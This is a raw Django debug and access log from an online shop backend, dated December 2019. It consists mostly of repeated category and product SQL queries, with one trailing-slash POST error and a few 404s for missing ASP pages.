"shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 09:31:09,724 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 09:31:09,728 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 09:31:09,732 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 09:31:09,736 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 09:31:09,742 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 09:31:09,746 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 09:31:09,750 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 09:31:09,754 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 09:31:09,758 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 09:31:09,764 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 09:31:09,768 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 09:31:09,772 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 09:31:09,776 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 09:31:09,780 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 09:31:09,786 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 09:31:09,790 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 09:31:09,794 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 09:31:09,798 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 09:31:09,802 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 09:31:09,806 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 09:31:09,812 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 09:31:09,816 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 09:31:09,820 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 09:31:09,824 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 09:31:09,828 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 09:31:09,835 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 09:31:09,839 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 09:31:09,843 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 09:31:09,847 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 09:31:09,851 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 09:31:09,858 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 09:31:09,862 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 09:31:09,865 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 09:31:09,869 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 09:31:09,873 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 09:31:09,877 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 09:31:09,882 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 09:31:09,886 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 09:31:09,890 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 09:31:09,895 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 09:31:09,899 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 09:31:09] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 09:33:00] "GET / HTTP/1.0" 302 0 [27/Dec/2019 09:37:02] "GET / HTTP/1.0" 302 0 [27/Dec/2019 09:45:07] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 185.61.137.172/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [27/Dec/2019 09:48:35] "POST /editBlackAndWhiteList HTTP/1.0" 500 64007 [27/Dec/2019 09:50:10] "GET / HTTP/1.0" 302 0 [27/Dec/2019 09:55:13] "GET / HTTP/1.0" 302 0 [27/Dec/2019 10:00:18] "GET / HTTP/1.0" 302 0 [27/Dec/2019 10:10:01] "GET /whm-server-status HTTP/1.0" 301 0 [27/Dec/2019 10:10:04] "GET / HTTP/1.0" 302 0 [27/Dec/2019 10:15:06] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 10:16:16,705 utils 2749 140297254205184 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-27 10:16:16,709 utils 2749 140297254205184 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [27/Dec/2019 10:16:16] "GET /api/v1/fire/ HTTP/1.0" 200 482 [27/Dec/2019 10:16:17] "GET /media/products/2019/12/05/SampleGIFImage_350kbmb_vsJs0Zd.gif HTTP/1.0" 200 355854 [27/Dec/2019 10:16:17] "GET /media/products/2019/12/06/monika-grabkowska-zE6fKdd9QLI-unsplash.jpg HTTP/1.0" 200 3039441 [27/Dec/2019 10:16:17] "GET /media/products/2019/12/06/nathan-dumlao-9m6XwFTWGKs-unsplash.jpg HTTP/1.0" 200 3337046 [27/Dec/2019 10:20:09] "GET / HTTP/1.0" 302 0 [27/Dec/2019 10:27:08] "GET / HTTP/1.0" 302 0 [27/Dec/2019 10:32:11] "GET / HTTP/1.0" 302 0 [27/Dec/2019 10:37:13] "GET / HTTP/1.0" 302 0 [27/Dec/2019 10:42:16] "GET / HTTP/1.0" 302 0 [27/Dec/2019 10:47:46] "GET / HTTP/1.0" 302 0 [27/Dec/2019 10:57:00] "GET / HTTP/1.0" 302 0 [27/Dec/2019 10:57:25] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [27/Dec/2019 10:59:00] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /User/User_Favorite.asp [27/Dec/2019 10:59:05] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=206 HTTP/1.0" 404 6422 Not Found: /jyky/SendMail.asp [27/Dec/2019 10:59:14] "GET /jyky/SendMail.asp?ArticleID=117 HTTP/1.0" 404 6376 [27/Dec/2019 11:02:50] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [27/Dec/2019 11:07:42] "GET /robots.txt HTTP/1.0" 404 6341 [27/Dec/2019 11:07:42] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 11:07:42,670 utils 2749 140297243715328 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'mgjwmxsfr3dr1p2foczbclyblk50f3bd' LIMIT 1; args=('mgjwmxsfr3dr1p2foczbclyblk50f3bd',) DEBUG 2019-12-27 11:07:42,672 utils 2749 140297243715328 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('mgjwmxsfr3dr1p2foczbclyblk50f3bd', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-10T11:07:42.671076+00:00'::timestamptz); args=('mgjwmxsfr3dr1p2foczbclyblk50f3bd', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 10, 11, 7, 42, 671076, tzinfo=)) [27/Dec/2019 11:07:42] "GET /login/?next=/ HTTP/1.0" 200 1786 [27/Dec/2019 11:10:04] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 11:11:22,841 utils 2749 140297243715328 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-27 11:11:22,846 utils 2749 140297243715328 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [27/Dec/2019 11:11:22] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-27 11:11:22,961 utils 2749 140297243715328 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 11:11:22,967 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 11:11:22,971 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 11:11:22,973 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 11:11:22,977 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 11:11:22,979 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 11:11:22,981 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 11:11:22,983 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 11:11:22,985 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 11:11:22,989 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 11:11:22,991 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 11:11:22,993 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 11:11:22,995 utils 